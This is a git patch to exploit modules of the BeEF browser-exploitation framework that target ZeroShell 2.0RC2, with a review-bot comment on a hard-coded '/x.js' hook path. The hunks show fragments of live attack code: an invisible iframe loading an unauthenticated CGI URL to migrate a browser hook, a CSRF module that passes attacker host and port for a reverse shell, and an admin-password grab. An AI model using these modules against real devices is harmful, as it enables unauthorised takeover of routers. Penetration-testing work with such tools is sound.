From 861e846dbea6754b529a2dfc4dbe4aac433e0ea7 Mon Sep 17 00:00:00 2001
From: Yann CAM
Date: Wed, 5 Oct 2016 14:20:12 +0200
Subject: [PATCH] Update hookuri auto-generated and generic (proto / host / port / hook name). Replace tab with space.
---
 .../zeroshell/zeroshell_2_0rc2_admin_password/config.yaml | 2 +-
 .../zeroshell/zeroshell_2_0rc2_migrate_hook/command.js | 6 +++---
 .../zeroshell/zeroshell_2_0rc2_migrate_hook/module.rb | 2 --
 .../command.js | 4 ++--
 .../module.rb | 2 --
 5 files changed, 6 insertions(+), 10 deletions(-)
diff --git a/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_password/config.yaml b/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_password/config.yaml
index fa7bb5389..de83a91cb 100644
--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_password/config.yaml
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_password/config.yaml
@@ -7,7 +7,7 @@ beef:
 module:
 zeroshell_2_0rc2_admin_password:
 enable: true
- category: ["Exploits", "ZeroShell"]
+ category: ["Exploits", "ZeroShell"]
 name: "ZeroShell <= 2.0RC2 Admin Password"
 description: "Attempts to get the admin password on a ZeroShell <= 2.0RC2
This module works only when the hook is on ZeroShell, please migrate to the ZeroShell target before using it.
Vulnerability found and PoC provided by Yann CAM @ASafety / Synetis.
BeEF module originally created by ycam.
For more information refer to http://packetstormsecurity.com/files/122799/zeroshell-execdisclose.txt
Patched in version 2.0RC3.
" authors: ["ycam"] diff --git a/modules/exploits/zeroshell/zeroshell_2_0rc2_migrate_hook/command.js b/modules/exploits/zeroshell/zeroshell_2_0rc2_migrate_hook/command.js index d146e2631..5e0f193db 100644 --- a/modules/exploits/zeroshell/zeroshell_2_0rc2_migrate_hook/command.js +++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_migrate_hook/command.js @@ -7,10 +7,10 @@ beef.execute(function() { var rhost = '<%= @rhost %>'; var rport = '<%= @rport %>'; - var hookuri = '<%= @hookuri %>'; + var hook = beef.net.httpproto + "://" + beef.net.host + ":" + beef.net.port + beef.net.hook; + + var target = "http://" + rhost + ":" + rport +"/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=x"; - var target = "http://" + rhost + ":" + rport +"/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=x"; - var iframe_<%= @command_id %> = beef.dom.createInvisibleIframe(); iframe_<%= @command_id %>.setAttribute('src', target); diff --git a/modules/exploits/zeroshell/zeroshell_2_0rc2_migrate_hook/module.rb b/modules/exploits/zeroshell/zeroshell_2_0rc2_migrate_hook/module.rb index 8c9976cdc..7bc7ada20 100644 --- a/modules/exploits/zeroshell/zeroshell_2_0rc2_migrate_hook/module.rb +++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_migrate_hook/module.rb @@ -7,9 +7,7 @@ class Zeroshell_2_0rc2_migrate_hook < BeEF::Core::Command def self.options configuration = BeEF::Core::Configuration.instance - hookuri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js" return [ - { 'name' => 'hookuri', 'ui_label' => 'URL', 'type' => 'text', 'width' => '400px', 'value' => hookuri}, { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.0.1'}, { 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' } ] diff --git a/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/command.js b/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/command.js index 009b627f0..4864042ee 100644 
--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/command.js
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/command.js
@@ -9,9 +9,9 @@ beef.execute(function() {
 var rport = '<%= @rport %>';
 var lhost = '<%= @lhost %>';
 var lport = '<%= @lport %>';
- var hookuri = '<%= @hookuri %>';
+ var hook = beef.net.httpproto + "://" + beef.net.host + ":" + beef.net.port + "/x.js";
- var target = "http://" + rhost + ":" + rport +"/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=x#lhost=" + lhost + "&lport=" + lport;
+ var target = "http://" + rhost + ":" + rport +"/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=x#lhost=" + lhost + "&lport=" + lport;
 var iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
 iframe_<%= @command_id %>.setAttribute('src', target);
diff --git a/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/module.rb b/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/module.rb
index 27646afa2..d2dd74177 100644
--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/module.rb
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/module.rb
@@ -12,9 +12,7 @@ class Zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass < BeEF::Core::Command
 configuration = BeEF::Core::Configuration.instance
 lhost = "#{configuration.get("beef.http.host")}"
 lhost = "" if lhost == "0.0.0.0"
- hookuri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/x.js"
 return [
- { 'name' => 'hookuri', 'ui_label' => 'URL', 'type' => 'text', 'width' => '400px', 'value' => hookuri},
 { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.0.1'},
 { 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' },
 { 'name' => 'lhost', 'ui_label' => 'Local Host', 'value' => lhost},
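Review bot: The new `hook` line hard-codes `"/x.js"` while the companion zeroshell_2_0rc2_migrate_hook/command.js hunk derives the last segment from `beef.net.hook`, so only proto, host and port are actually "generic" here, contrary to what the commit title suggests. If `/x.js` is deliberately a distinct resource from the configured hook path (the removed Ruby option used the same literal, which hints at that), a short comment would stop a later reader from "harmonising" it: `// /x.js is a fixed resource name, intentionally not beef.net.hook`. If it is not deliberate, the line should read `var hook = beef.net.httpproto + "://" + beef.net.host + ":" + beef.net.port + beef.net.hook;` to match the other module. The enclosing `beef.execute` callback begins and ends outside the hunk.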